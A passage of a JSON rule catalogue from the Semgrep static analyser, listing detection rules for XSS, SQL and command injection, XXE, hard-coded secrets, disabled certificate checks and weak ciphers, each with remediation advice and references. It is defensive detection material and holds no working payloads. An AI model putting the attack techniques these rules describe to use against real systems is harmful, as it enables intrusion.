input."},"helpUri":"https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","id":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","name":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"help":{"markdown":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1)\n","text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1","id":"python.lang.compatibility.python37.python37-compatibility-os1","name":"python.lang.compatibility.python37.python37-compatibility-os1","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-os1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli)\n - [https://pg.uptrace.dev/](https://pg.uptrace.dev/)\n - [https://pkg.go.dev/github.com/go-pg/pg/v10](https://pkg.go.dev/github.com/go-pg/pg/v10)\n","text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli","id":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","name":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pg-sqli.pg-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"help":{"markdown":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system","id":"cpp.lang.security.system-command.dont-call-system.dont-call-system","name":"cpp.lang.security.system-command.dont-call-system.dont-call-system","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.dont-call-system.dont-call-system"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"help":{"markdown":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version)\n - [https://www.landh.tech/blog/20230811-sandwich-attack/](https://www.landh.tech/blog/20230811-sandwich-attack/)\n","text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version","id":"python.lang.security.insecure-uuid-version.insecure-uuid-version","name":"python.lang.security.insecure-uuid-version.insecure-uuid-version","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-uuid-version.insecure-uuid-version"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request)\n - [https://owasp.org/www-community/attacks/Command_Injection](https://owasp.org/www-community/attacks/Command_Injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection)\n - [https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection](https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","id":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","name":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","id":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","name":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Oracle update is not restricted in $F()"},"help":{"markdown":"Oracle update is not restricted in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control)\n - [https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0](https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0)\n","text":"Oracle update is not restricted in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","id":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","name":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","id":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","name":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"help":{"markdown":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use)\n - [https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html](https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html)\n - [https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation](https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation)\n - [http://phrack.org/papers/escaping_the_java_sandbox.html](http://phrack.org/papers/escaping_the_java_sandbox.html)\n","text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"helpUri":"https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use","id":"java.lang.security.do-privileged-use.do-privileged-use","name":"java.lang.security.do-privileged-use.do-privileged-use","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.do-privileged-use.do-privileged-use"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","id":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","name":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string","id":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","name":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli)\n - [https://www.npmjs.com/package/mssql](https://www.npmjs.com/package/mssql)\n","text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","id":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","name":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"help":{"markdown":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","id":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","name":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","properties":{"precision":"very-high","tags":["CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crlf-injection-logs.crlf-injection-logs"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"help":{"markdown":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","id":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","name":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"help":{"markdown":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation)\n - [https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib](https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib)\n","text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"helpUri":"https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation","id":"python.requests.security.disabled-cert-validation.disabled-cert-validation","name":"python.requests.security.disabled-cert-validation.disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.requests.security.disabled-cert-validation.disabled-cert-validation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","id":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","name":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"help":{"markdown":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag)\n - [https://owasp.org/www-community/controls/SecureCookieAttribute](https://owasp.org/www-community/controls/SecureCookieAttribute)\n","text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","id":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","name":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"help":{"markdown":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files.\n\nReferences:\n - [Semgrep 